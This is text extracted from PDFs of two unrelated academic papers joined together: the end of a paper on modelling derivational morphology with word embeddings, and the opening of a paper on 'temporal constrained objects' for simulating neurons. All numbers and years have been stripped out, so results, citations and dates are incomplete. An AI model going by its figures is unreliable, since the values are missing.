we trained all models for iterations of adam (kingma and ba, ) with l regularization with regularization coefficient . . table shows that the two character-level mod- els (“c-gru” and “c-lstm”) perform much worse than our models. this indicates that supervised mor- phological analysis produces higher-quality vector representations than “knowledge-poor” character- level models. however, we note that these character-level models have fewer parameters than our morpheme-level models—there are many more morphemes in a languages than characters. oracle morphology. in general, the two- morpheme assumption is incorrect. we consider an expanded setting of lazaridou et al. ( )’s task, in which we fully decompose the word, e.g., unquestionably →un+question+able+ly. these results are reported in table (top block, “oracle”). we report mean cosine similarity. standard devia- tions s for -fold cross-validation (not shown) are small (≤ . ) with two exceptions: s = . for the deps-joint-stem results (. and . ). the multi-morphemic results mirror those of the bi-morphemic setting of lazaridou et al. ( ). (i) rnn+deps attains an average cosine similarity of around . for english. numbers for german are lower, around . . (ii) the rnn only marginally edges out lds for english and is slightly worse for german. again, this is not surprising as we are mod- eling short sequences. (iii) certain embeddings lend themselves more naturally to derivational composi- tionality: bow is better than bow , deps is the clear winner. inferred morphology. the final setting we con- sider is the vector approximation task without gold morphology. in this case, we rely on the full joint model p(v,s, l,u | w). at evaluation, we are in- terested in the marginal distribution p(v | w) =∑ s,l,u p(v,s, l,u | w). we then use importance sampling to approximate the mean of this marginal distribution as the predicted embedding, i.e., v̂ = ∫ vp(v | w)dv ( ) ≈ ∑m i= w (i) m∑ i= w(i)cβ(l(i),s(i)), ( ) where w(i) are the importance weights defined in equation and l(i) and s(i) are the ith sampled la- beling and segmentation, respectively. discussion. surprisingly, table (joint) shows that relying on the inferred morphology does not drastically affect the results. indeed, we are often within . of the result with gold morphology. our method can be viewed as a retrofitting procedure (faruqui et al., ), so this result is useful: it indi- cates that joint semantic synthesis and morphologi- cal analysis produces high-quality vectors. . experiment : derivational productivity we now delve into the relation between distribu- tional semantics and morphological productivity. the extent to which jointly modeling semantics aids morphological analysis will be determined by the in- herent compositionality of the words within the vec- tor space. we break down our results on the vector approximation task with gold morphology using the -ly -ness -ize -able in- -ful -ous -less -ic -ist -y un- -ity re- -ion -ment -al -er affix . . . . . . . . . a v er a g e c o si n e s im il a ri ty figure : the boxplot breaks down the cosine similarity between the approximated vector and the target vector by affix (using gold morphology). we have ordered the affixes such that the better approximated vectors are on the left. dependency vectors and the rnn composer in fig- ure by selected affixes. we observe a wide range of scores: the most compositional ending ly gives rise to cosine similarities that are points higher than those of the least compositional er. 
on the left end of figure we see extremely pro- ductive suffixes. the affix ize is used productively with relatively obscure words in the sciences, e.g., rao-blackwellize. likewise, the affix ness can be applied to almost any adjective without restriction, e.g., poissonness ‘degree to which data have a pois- son distribution’. on the right end, we find -ment, -er and re-. the affix -ment is borderline productive (bauer, )—modern english tends to form novel nominalizations with ness or ity. more interesting are re- and er, both of which are very productive in english. for er, many of the words bringing down the average are simply non-compositional. for ex- ample, homer ‘homerun in baseball’ is not derived from home+er—this is an error in data. we also see examples like cutter. it has a compositional read- ing (e.g., “box cutter”), but also frequently occurs in the non-compositional meaning ‘type of boat’. fi- nally, proper nouns like homer and turner end in er and in our experiments we computed vectors for lowercased words. the affix re- similarly has a large number of non-compositional cases, e.g., remove, relocate, remark. indeed, to get the compositional reading of remove, the first syllable (rather than the second) is typically stressed to emphasize the prefix. we finally note several limitations of this exper- iment. (i) the ability of our models—even the re- current neural network—to model transformations between vectors is limited. (ii) our vectors are far from perfect; e.g., sparseness in the training data af- fects quality and some of the words in our corpus are rare. (iii) semantic coherence is not the only crite- rion for productivity. an example is -th in english. as noted earlier, it is compositional in a word like warmth, but it cannot be used to form new words. conclusion we have presented a model of the semantics and structure of derivationally complex words. to the best of our knowledge, this is the first attempt to jointly consider, within a single model, (i) the mor- phological decomposition of the word form and (ii) the semantic coherence of the resulting anal- ysis. we found that directly modeling coherence increases segmentation accuracy, improving over a strong baseline. also, our models show state-of-the- art performance on the derivational vector approxi- mation task introduced by lazaridou et al. ( ). future work will focus on the extension of the method to more complex instances of derivational morphology, e.g., compounding and reduplication, and on the extension to additional languages. we also plan to explore the relation between derivation and distributional semantics in greater detail. acknowledgments. the first author was sup- ported by a daad long-term research grant and an ndseg fellowship and the second by a volk- swagenstiftung opus magnum grant. we would also like to thank action editor regina barzilay for suggesting several changes we incorporated into the work and the three anonymous reviewers. references mohamed afify, ruhi sarikaya, hong-kwang jeff kuo, laurent besacier, and yuqing gao. . on the use of morphological analysis for dialectal arabic speech recognition. in ninth international conference on spoken language processing. mark aronoff. . word formation in generative grammar. mit press. harald baayen, richard piepenbrock, and hedderik van rijn. . the celex lexical data base on cd- rom. miguel ballesteros, chris dyer, and noah a. smith. . improved transition-based parsing by model- ing characters instead of words with lstms. 
in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , lisbon, portugal, september. association for compu- tational linguistics. laurie bauer. . english word-formation. cam- bridge university press. yoshua bengio and jean-sébastien senecal. . quick training of probabilistic neural nets by impor- tance sampling. in proceedings of the ninth interna- tional conference on artificial intelligence and statis- tics. jan a. botha and phil blunsom. . compositional morphology for word representations and language modelling. in international conference on machine learning, pages – . kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. a. on the properties of neural machine translation: encoder–decoder ap- proaches. workshop on syntax, semantics and struc- ture in statistical translation. kyunghyun cho, bart van merriënboer, caglar gul- cehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. b. learning phrase representations using rnn encoder-decoder for statistical machine translation. in conference on empirical methods in natural language processing. noam chomsky and morris halle. . the sound pat- tern of english. harper & row. noam chomsky. . aspects of the theory of syntax. mit press. ann clifton and anoop sarkar. . combin- ing morpheme-based machine translation with post- processing morpheme prediction. in proceedings of the th annual meeting of the association for com- putational linguistics: human language technolo- gies, pages – , portland, oregon, usa, june. as- sociation for computational linguistics. ryan cotterell, nanyun peng, and jason eisner. . stochastic contextual edit distance and probabilistic fsts. in proceedings of the nd annual meeting of the association for computational linguistics (vol- ume : short papers), pages – , baltimore, maryland, june. association for computational lin- guistics. ryan cotterell, thomas müller, alexander fraser, and hinrich schütze. . labeled morphological seg- mentation with semi-markov models. in proceed- ings of the nineteenth conference on computational natural language learning, pages – , beijing, china, july. association for computational linguis- tics. ryan cotterell, arun kumar, and hinrich schütze. a. morphological segmentation inside-out. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , austin, texas, november. association for computational linguistics. ryan cotterell, tim vieira, and hinrich schütze. b. a joint model of orthography and morphological seg- mentation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , san diego, california, june. association for computational linguistics. mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions on speech and language processing, ( ): . cı́cero nogueira dos santos and bianca zadrozny. . learning character-level representations for part-of- speech tagging. in international conference on ma- chine learning, pages – . markus dreyer and jason eisner. . discover- ing morphological paradigms from plain text using a dirichlet process mixture model. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational linguistics, july. markus dreyer. . 
a non-parametric model for the discovery of inflectional paradigms from plain text using graphical models over strings. ph.d. thesis, johns hopkins university. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – . jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . manaal faruqui, jesse dodge, sujay kumar jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , denver, colorado, may–june. association for computational linguistics. manaal faruqui, ryan mcdonald, and radu soricut. a. morpho-syntactic lexicon generation using graph-based semi-supervised learning. transactions of the association for computational linguistics, : – . manaal faruqui, yulia tsvetkov, graham neubig, and chris dyer. b. morphological inflection gen- eration using character sequence to sequence learn- ing. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , san diego, california, june. as- sociation for computational linguistics. orhan firat, kyunghyun cho, and yoshua bengio. . multi-way, multilingual neural machine translation with a shared attention mechanism. in proceedings of the conference of the north american chap- ter of the association for computational linguistics: human language technologies, pages – , san diego, california, june. association for computa- tional linguistics. gottlob frege. . über begriff und gegenstand. vierteljahresschrift für wissenschaftliche philosophie, : – . dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilingual language process- ing from bytes. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – , san diego, califor- nia, june. association for computational linguistics. christoph goller and andreas küchler. . learning task-dependent distributed representations by back- propagation through structure. in ieee international conference on neural networks. kazuma hashimoto and yoshimasa tsuruoka. . adaptive joint learning of compositional and non- compositional phrase embeddings. in proceedings of the th annual meeting of the association for com- putational linguistics (volume : long papers), pages – , berlin, germany, august. association for computational linguistics. martin haspelmath and andrea sims. . under- standing morphology. routledge. irene heim and angelika kratzer. . semantics in generative grammar. blackwell. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . katharina kann, ryan cotterell, and hinrich schütze. . neural morphological analysis: encoding- decoding canonical segments. in proceedings of the conference on empirical methods in natural language processing, pages – , austin, texas, november. association for computational linguis- tics. ronald m. kaplan and martin kay. . regular mod- els of phonological rule systems. computational lin- guistics, ( ): – . martin kay. . morphological and syntactic analysis. linguistic structures processing, : . yoon kim, yacine jernite, david sontag, and alexan- der m. rush. . character-aware neural language models. 
in proceedings of the thirtieth aaai confer- ence on artificial intelligence, pages – . diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in international conference on learning representations. max kisselew, sebastian padó, alexis palmer, and jan šnajder. . obtaining a better understanding of distributional models of german derivational morphol- ogy. in proceedings of the th international confer- ence on computational semantics, pages – . daphne koller and nir friedman. . probabilistic graphical models: principles and techniques. mit press. lingpeng kong, chris dyer, and noah a smith. . segmental recurrent neural networks. in th interna- tional conference on learning representations. mikko kurimo, sami virpioja, ville turunen, and krista lagus. . morpho challenge competition – : evaluations and results. in special interest group on computational morphology and phonology. angeliki lazaridou, marco marelli, roberto zamparelli, and marco baroni. . compositional-ly derived representations of morphologically complex words in distributional semantics. in proceedings of the st annual meeting of the association for computational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for com- putational linguistics. omer levy and yoav goldberg. a. dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, maryland, june. association for computa- tional linguistics. omer levy and yoav goldberg. b. neural word embedding as implicit matrix factorization. in ad- vances in neural information processing systems, pages – . marc light. . morphological cues for lexical se- mantics. in proceedings of the th annual meeting of the association for computational linguistics, pages – , santa cruz, california, usa, june. associa- tion for computational linguistics. wang ling, chris dyer, alan w. black, isabel trancoso, ramon fermandez, silvio amir, luis marujo, and tiago luis. . finding function in form: com- positional character models for open vocabulary word representation. in proceedings of the conference on empirical methods in natural language process- ing, pages – , lisbon, portugal, september. association for computational linguistics. thang luong, richard socher, and christopher man- ning. . better word representations with recur- sive neural networks for morphology. in proceedings of the seventeenth conference on computational nat- ural language learning, pages – , sofia, bul- garia, august. association for computational linguis- tics. john lyons. . semantics. cambridge university press. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. in th international conference on learning representations. tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. b. distributed rep- resentations of words and phrases and their composi- tionality. in advances in neural information process- ing systems, pages – . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of association of computational linguistics, pages – , columbus, ohio, june. association for computa- tional linguistics. kevin p. murphy. . machine learning: a proba- bilistic perspective. mit press. jason naradowsky and sharon goldwater. . im- proving morphology induction by learning spelling rules. 
in twenty-first international joint conference on artificial intelligence, pages – . karthik narasimhan, damianos karakos, richard schwartz, stavros tsakalidis, and regina barzilay. . morphological segmentation for keyword spot- ting. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. as- sociation for computational linguistics. karthik narasimhan, regina barzilay, and tommi jaakkola. . an unsupervised method for uncov- ering morphological chains. transactions of the asso- ciation for computational linguistics, : – . oup editors. . new oxford american dictionary. oxford university press. sebastian padó, alexis palmer, max kisselew, and jan šnajder. . measuring semantic content to as- sess asymmetry in derivation. in proceedings of the th international conference on computational se- mantics. lawrence r. rabiner. . a tutorial on hidden markov models and selected applications in speech recognition. proceedings of the institute of electrical and electronics engineers, ( ): – . pushpendre rastogi, ryan cotterell, and jason eisner. . weighting finite-state transductions with neu- ral context. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , san diego, california, june. association for computational linguistics. eric s. ristad and peter n. yianilos. . learning string-edit distance. ieee transactions on pattern analysis and machine intelligence, ( ): – . reuven y. rubinstein and dirk p. kroese. . sim- ulation and the monte carlo method. john wiley & sons. teemu ruokolainen, oskar kohonen, sami virpioja, and mikko kurimo. . supervised morphological seg- mentation in a low-resource learning setting using con- ditional random fields. in proceedings of the sev- enteenth conference on computational natural lan- guage learning, pages – , sofia, bulgaria, au- gust. association for computational linguistics. gerard salton, editor. . the smart retrieval system—experiments in automatic document pro- cessing. prentice hall. sunita sarawagi and william w. cohen. . semi- markov conditional random fields for information ex- traction. in advances in neural information process- ing systems, pages – . patrick schone and daniel jurafsky. . knowledge- free induction of morphology using latent semantic analysis. in proceedings the th conference on com- putational natural language learning, pages – . association for computational linguistics. patrick schone and daniel jurafsky. . knowledge- free induction of inflectional morphologies. in pro- ceedings of the second meeting of the north american chapter of the association for computational linguis- tics on language technologies, pages – . associa- tion for computational linguistics. wolfgang seeker and özlem çetinoğlu. . a graph- based lattice dependency parser for joint morpholog- ical segmentation and syntactic analysis. transac- tions of the association for computational linguistics, : – . radu soricut and franz och. . unsupervised mor- phology induction using word embeddings. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , denver, colorado, may–june. association for computational linguistics. ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems, pages – . 
charles sutton and andrew mccallum. . an in- troduction to conditional random fields for relational learning. in lise getoor and ben taskar, editors, introduction to statistical relational learning, pages – . mit press. peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . antal van den bosch and walter daelemans. . memory-based morphological analysis. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – , college park, maryland, usa, june. association for compu- tational linguistics. martin j. wainwright and michael i. jordan. . graphical models, exponential families, and varia- tional inference. foundations and trends in machine learning, ( - ): – . zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph and text jointly em- bedding. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. paul j. werbos. . backpropagation through time: what it does and how to do it. proceedings of the institute of electrical and electronics engineers, ( ): – . richard wicentowski. . modeling and learning multilingual inflectional morphology in a minimally supervised framework. ph.d. thesis, johns hopkins university. yadollah yaghoobzadeh and hinrich schütze. . corpus-level fine-grained entity typing using contex- tual information. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , lisbon, portugal, september. association for computational linguistics. david yarowsky and richard wicentowski. . min- imally supervised morphological analysis by multi- modal alignment. in the th annual meeting of the association for computational linguistics. wenpeng yin and hinrich schütze. . convolutional neural network for paraphrase identification. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , denver, colorado, may–june. association for computational linguistics. britta d. zeller, jan šnajder, and sebastian padó. . derivbase: inducing and evaluating a derivational morphology resource for german. in proceedings of the st annual meeting of the association for com- putational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for computational linguistics. britta d. zeller, sebastian padó, and jan šnajder. . towards semantic validation of a derivational lexicon. in proceedings the th international conference on computational linguistics, pages – , dublin, ireland, august. dublin city university and associa- tion for computational linguistics. 
temporal constrained objects for modelling neuronal dynamics temporal constrained objects for modelling neuronal dynamics manjusha nair , , jinesh manchan kannimoola , bharat jayaraman , bipin nair and shyam diwakar amrita school of biotechnology, amrita vishwa vidyapeetham, kollam, kerala, india department of computer science and applications, amritapuri campus, amrita vishwa vidyapeetham, kollam, kerala, india center for cybersecurity systems and networks, amritapuri campus, amrita vishwa vidyapeetham, kollam, kerala, india department of computer science & engineering, state university of new york at buffalo, buffalo, ny, usa abstract background: several new programming languages and technologies have emerged in the past few decades in order to ease the task of modelling complex systems. modelling the dynamics of complex systems requires various levels of abstractions and reductive measures in representing the underlying behaviour. this also often requires making a trade-off between how realistic a model should be in order to address the scientific questions of interest and the computational tractability of the model. methods: in this paper, we propose a novel programming paradigm, called temporal constrained objects, which facilitates a principled approach to modelling complex dynamical systems. temporal constrained objects are an extension of constrained objects with a focus on the analysis and prediction of the dynamic behaviour of a system. the structural aspects of a neuronal system are represented using objects, as in object-oriented languages, while the dynamic behaviour of neurons and synapses are modelled using declarative temporal constraints. computation in this paradigm is a process of constraint satisfaction within a time-based simulation. results: we identified the feasibility and practicality in automatically mapping different kinds of neuron and synapse models to the constraints of temporal constrained objects. simple neuronal networks were modelled by composing circuit components, implicitly satisfying the internal constraints of each component and interface constraints of the composition. simulations show that temporal constrained objects provide significant conciseness in the formulation of these models. the underlying computational engine employed here automatically finds the solutions to the problems stated, reducing the code for modelling and simulation control. all examples reported in this paper have been programmed and successfully tested using the prototype language called tcob. the code along with the programming environment are available at http://github.com/compneuro/ tcob_neuron. discussion: temporal constrained objects provide powerful capabilities for modelling the structural and dynamic aspects of neural systems. capabilities of the constraint programming paradigm, such as declarative specification, the ability to express partial information and non-directionality, and capabilities of the object-oriented paradigm especially aggregation and inheritance, make this paradigm the right candidate for complex systems and computational modelling studies. with the advent of multi-core how to cite this article nair et al. ( ), temporal constrained objects for modelling neuronal dynamics. peerj comput. sci. :e ; doi . /peerj-cs. submitted march accepted june published july corresponding author shyam diwakar, shyam@amrita.edu academic editor nicolas rougier additional information and declarations can be found on page doi . /peerj-cs. copyright nair et al. 
parallel computer architectures and techniques for parallel constraint-solving, the paradigm of temporal constrained objects lends itself to highly efficient execution, which is necessary for modelling and simulation of large brain circuits. subjects computational biology, scientific computing and simulation, programming languages keywords temporal constrained objects, constraint programming, object-oriented languages, declarative modelling, neuron models introduction modelling complex systems using computer languages has spanned a wide range of domains: from organs and organ systems to weather and atmospheric turbulence to economic systems and social networks. while it is the responsibility of the programmer to choose an appropriate paradigm for the problem at hand, conventional languages are limited in their ability to provide the right framework for a broad range of problems. models for complex problems tend to be large and unwieldy, so it is critically important that the programming language used to build such models does not exacerbate the problem with inadequate support. in this regard, imperative languages demand more effort from the programmer, who must supply the detailed data representations and algorithms needed to solve a problem. this adds another layer of software complexity, especially when the system being modelled is itself highly complex. declarative languages had their origins in the s and are useful for modelling a problem directly by stating the properties of its solutions (benhamou, jussien & o'sullivan, ). in constraint-based languages, programmers declaratively specify the relations between variables using constraints, and the task of solving and maintaining the constraints is the responsibility of the underlying constraint solvers (freeman-benson, maloney & borning, ). this approach provides the desired separation between the problem-specification phase and the problem-solving phase. in this paper, we present a compositional approach in constraint programming to model the structure and behaviour of complex biological systems using the concept of temporal constrained objects (kannimoola et al., ). temporal constrained objects are an extension of the paradigm of constrained objects, which has been studied for over three decades (borning, ; leler, ; horn, ; tambay, ) and provides a declarative approach to data abstraction using the concepts of classes, hierarchies and aggregation found in object-oriented languages (lago & artalejo, ; reiner & zimmer, ). constrained objects also provide a declarative approach to behavioural specification using constraints within the class (jayaraman & tambay, ). constrained objects have previously been used to model cellular behaviour (covert, famili & palsson, ) and metabolic pathways in cells (pushpendran, ) in the context of biological systems. although constraint satisfaction problems were introduced originally as a static framework, the paradigm of temporal constrained objects allows a modeller to solve a broader class of problems.
in temporal constrained objects, constraint-solving is integrated within a time-based simulation regime and is well-suited to problem domains that require ordinary differential equations or partial differential equations. extensions to constraint programming frameworks, such as hybrid concurrent constraint programming (gupta et al., ), have also proved to be useful in modelling constraint satisfaction problems with time-varying behaviours. temporal constrained objects were successful in modelling highly dynamic systems such as vehicular networks (kannimoola, jayaraman & achuthan, ) and firewalls (kannimoola, jayaraman & achuthan, ). this paper applies similar modelling principles to neural microcircuits. in this paper, we demonstrate how the paradigm of temporal constrained objects can be applied to modelling the structure and behaviour of a complex biological system. temporal constrained objects are appropriate for systems whose behaviour is governed by physical laws. the adaptive and dynamic nature of neural circuits demands efficient modelling strategies to incorporate structural compositions of the constituents at various translational levels, from ion channels to neurons to networks and behavioural systems. this paradigm is suitable for modelling neural systems since it focuses on a component-based modelling approach, with individual components governed by invariant principles. for example, the signalling mechanisms of neurons and synapses and their non-linear dynamics are represented by membrane voltage models constrained by current and voltage laws, and are also known to be constrained by neuronal anatomy and the interconnections between neurons (gutkin, pinto & ermentrout, ). while building neural networks, the aggregation of different neuronal circuit elements was automatically addressed using internal and interface constraints, without imposing the relations explicitly from outside. in this paper, the section 'background' gives background about the programming language aspects of temporal constrained objects followed by the essential modelling principles of neural systems. computational modelling of neural systems using temporal constrained objects is described in the section 'methods.' we present a detailed case study of an implementation of neurons and the micro-circuitry of a rat cerebellum granular layer. the 'results' section includes the results of modelling with temporal constrained objects as well as model validations and performance optimizations. the last two sections of the paper highlight the discussion followed by conclusions and remarks on future research directions. background programming methodology popular mainstream programming languages such as c, java or python require the programmer to specify detailed procedural instructions on how to solve a problem. in these languages, model specification and model implementation details are interwoven. in contrast, a declarative program specifies the expected result of a computation without explicitly detailing the steps that must be performed to obtain that result. that is, declarative programming focuses more on what is to be computed, rather than how (lloyd, ). in this paper we introduce a declarative programming paradigm called temporal constrained objects which integrates declarative constraints and constraint solving within the popular object-oriented paradigm for data abstraction.
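To make this idea concrete, the sketch below phrases a leaky integrate-and-fire membrane equation as a per-time-step relation and lets a time-stepped loop keep it satisfied. This is plain Python, not TCOB code, and none of the parameter values are taken from the paper; in a constrained-object engine the solver, rather than hand-written update code, would enforce the relation.

```python
# Illustration only, not TCOB code; all parameter values are invented.
class LIFNeuron:
    """Leaky integrate-and-fire cell whose update is phrased as a constraint."""

    def __init__(self, c_m=1.0, g_l=0.1, e_l=-65.0, v_th=-50.0, v_reset=-65.0):
        self.c_m, self.g_l, self.e_l = c_m, g_l, e_l
        self.v_th, self.v_reset = v_th, v_reset
        self.v = e_l                      # membrane potential (mV)

    def residual(self, v_next, i_ext, dt):
        # the temporal constraint relating V at t+dt to V at t:
        #   C_m * (V' - V)/dt + g_L * (V - E_L) - I_ext = 0
        return self.c_m * (v_next - self.v) / dt + self.g_l * (self.v - self.e_l) - i_ext

    def step(self, i_ext, dt):
        # solve the (linear) constraint for v_next; a constrained-object engine
        # would hand this residual to its solver instead of solving it by hand
        v_next = self.v + dt / self.c_m * (i_ext - self.g_l * (self.v - self.e_l))
        assert abs(self.residual(v_next, i_ext, dt)) < 1e-9
        spiked = v_next >= self.v_th
        self.v = self.v_reset if spiked else v_next
        return spiked

neuron = LIFNeuron()
spike_times = [t * 0.1 for t in range(2000) if neuron.step(i_ext=2.0, dt=0.1)]
print(len(spike_times), "spikes in 200 ms of simulated time")
```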
( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a constraint is a declarative specification of a relation between variables and does not explicitly specify a procedure or algorithm to enforce the relation. in constraint programming, the programmer models the system as a set of variables over well-defined domains and states the problem as a set of constraints on these variables. the constraint solver enumerates the possible values of the variables and checks whether these enumeration leads to a solution or not, by a process called constraint satisfaction. constraints have been used in the past for formulating many combinatorial problems, including search problems in artificial intelligence and operational research. object-oriented methods support component-based modelling where the whole system can be modelled incrementally using subsystems modelled previously. although most mainstream languages that support object-oriented principles follow the imperative style of programming, object-oriented languages supporting declarative semantics have also been proposed (lago & artalejo, ). in temporal constrained objects the state of an object, i.e., the values of its attributes, is determined by a set of declarative constraints rather than by imperative procedures. constraint-based and related systems among the first in the area of constrained objects was thinglab (borning, ), a constraint-based simulation laboratory designed for interactive graphical simulations. the kaleidoscope ’ language (lopez, freeman-benson & borning, ; govindarajan, jayaraman & mantha, ) integrated constraints and object-oriented programming for interactive graphical user interfaces. kaleidoscope added constraint hierarchies, multi-methods and constraint constructors, as well as user-defined constraints, which were simplified by the compiler to primitive constraints that could be solved by a primitive solver. bertrand (leler, ) was another language aimed at graphics applications, which was extended by bruce horn in his constrained object language siri (horn, ). this language used the notion of event pattern to declaratively specify state changes: by declaring what constraints held after the execution of a method, and also specifying which attributes may and may not change during the method execution. this constraint imperative language uses constraints to simulate imperative constructs such as updating, assignment and object identity. inspired by kaleidoscope, the language babelsberg (felgentreff et al., ) was developed that integrates constraints with object-oriented systems. a ruby extension has been developed wherein programmers could add constraints to existing ruby programs in incremental steps. another extension has been made accessible from the smalltalk language to enable the dynamic management of constraints, and a similar approach was followed by integrating constraint programming into java language environment (hon & chun, ). being early approaches, they provide a limited capability for expressing constraints. modelica (fritzson, ) is a constrained object language for modelling and simulation in the engineering context. it supports numerical constraints in an object-oriented framework and uses the matlab engine for constraint solving. temporal constrained objects presented in this paper also employs similar modelling principles. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ existing neuroscience modelling platforms and tools modelling and simulation techniques are extensively used as powerful complements to hypothesis testing for experimental studies related to biological and physiological systems. simulation engines, computing environments and languages help building the computational model of the system from mathematical models. currently, a neuroscience modeller has wide choice of tools that support better integration and model reuse across multiple simulators. while simulators such as neuron, genesis and nest employ domain-specific custom scripting languages to isolate model specification from simulation code, interoperable scripting was supported in simulators like moose and pynn (goddard & hood, ; hines & carnevale, ; diesmann & gewaltig, ; ray & bhalla, ; davison et al., ). neuron uses the interpreted language hoc for simulation control and a high-level language neuron model description language (nmodl) for describing models, where each line of nmodl is translated into equivalent c statements. both genesis and nestuse high-level simulation languages to model neurons and synapses. while the simulation kernel of nest is written in c++, python commands are used to formulate and run neuron simulations with an extended code generation support using cython (zaytsev & morrison, ). genesis also supports declarative modelling using a script-based language interpreter. these specialized tools are less verbose and can address different domain-specific modelling tasks in a computationally tractable way. all these simulators are software packages with several thousands of lines of code (loc) and pose model exchange and interoperability problems. although conceptual structure of modelling is commonly addressed in these simulators in a precise and concise manner, the simulation kernel of these tools uses object oriented and low level procedural code libraries. since conversion of models from one simulator to another is a non-trivial task, simulator-independent language initiatives facilitated model sharing and model reuse across multiple simulators. pynn and moose uses high level python libraries and apis to support simulator independent interface for neuron modelling. apart from these attempts, xml based model specification languages have helped reduce the implementation and platform dependent biases in the modelling process. as a model representation language, systems biology markup language provides a common format for describing models and supports interoperability among different tools in computational biology (hucka et al., ). neuroml (gleeson et al., ) uses distinctive xml schemas to represent the morphology (morphml), channel conductance (channelml) and network properties (networkml) of neural systems. nineml (raikov, ) uses xml based abstract object models and enable quick prototyping of neuron, synapse and network models using parameters for model variables, state update rules and mathematical descriptions. low entropy model specification also follows a similar approach and are more flexible in defining and translating models (cannon et al., ). even though the xml-based model description frameworks reduce external software dependencies, they do not provide any details on how to simulate the models. xml schemas supports model exchange and automated validation of nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ components but for better integration with existing simulators, these models should be easily translatable to multiple simulation platforms. the simulators need to either translate the models into equivalent internal models or use code generation through external or built in libraries. spiking neural mark-up language (spineml), an extension of nineml uses simulator specific extensible stylesheet language transformations (xslt) templates to generate the simulation code (richmond et al., ). the encoding of model details from xml format to the internal representation of the simulator completely depends on the data structure of the language selected for this translation. for example, mapping the neuroml model description to the internal data structure of the simulators such as neuron, genesis, pynn or moose is provided through simulator specific native scripts. although the aforementioned simulators hide the implementation complexity from the modeller either through gui or through modules and scripting, the software complexity of the simulator increases while satisfying these requirements. the computational architecture of the simulators handled the complexity and provided interfaces to the end user. since temporal constrained objects are founded on constraints, a model’s concept space (model specification) and computational space (simulation control) can be represented with less implementation complexity. for modelling multiple levels as in enzyme or biochemical kinematics to neurons and neural circuits, a constraint-based solver that could handle several models of differential equation style mathematical abstractions was attempted in this study. another motivation for our choice of the paradigm of temporal constrained objects is its amenability to parallelization. modern programming paradigms are biased more towards many-core and multi-core programming. current day simulation systems have become more reliant on high performance computing techniques. in computational neuroscience, a modelling study generally involves learning a domain specific language and then depending on the framework of this language to parallelize the programs. neuron and genesis require modifications in the coding strategy to port the model to cluster computing environment while nest almost transparently maps a model to multicore computers. brian has little support for parallelization which limits its use for large scale systems (goodman & brette, ). the transition of a software to parallelization is easier with declarative paradigms (darlington, reeve & wright, ). the advantage with parallel constraint programming is that no change is needed in the problem model for parallelization and the constraint framework handle the parallelization primitives. parallel constraint programming frameworks exist (rolf, ) which automatically parallelize the problem by dividing the task among several constraint solvers which perform parallel consistency and parallel search processes. since consistency checking during constraint solving has similarities to single instruction multiple thread parallelism, gpu level parallelization of constraint propagation has been explored recently (campeotto et al., ). although beyond the limits of this paper, integrating parallelization with temporal constrained objects frameworks will benefit the neuroscience community to easily create abstract models which are automatically scalable. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . 
/peerj-cs. https://peerj.com/computer-science/ temporal constrained objects constrained objects support object-oriented features, such as aggregation and inheritance, along with constraint-based specifications such as arithmetic equations and inequalities, quantified and conditional constraints. the programming language cob implements the constrained object paradigm (jayaraman & tambay, ). the cob language defines a set of classes, each of which contains a set of attributes, constraints, predicates and constructors. every constrained object is an instance of some class whose outline is as follows. class_definition ::= [ abstract] class class id [ extends class id ] {body} body :: = [ attributes attributes] [ constraints constraints] [ predicates predicates ] [ constructors constructors] a class may optionally extend another class and the attributes, constraints, predicates and constructors are all optional. constraints specify the relation between attributes of the typed classes. constrained objects support both primitive and user-defined attributes, and constraints may be simple, conditional, quantified, or aggregate (also see supplementary material for a complete specification of the grammar of the language) (tambay, ). temporal constrained objects extend the basic paradigm of constrained objects to support time-varying properties of dynamic systems. using temporal constrained objects, the structural aspects and the modularity of a system are modelled using encapsulation, inheritance and aggregation while the behavioural aspects 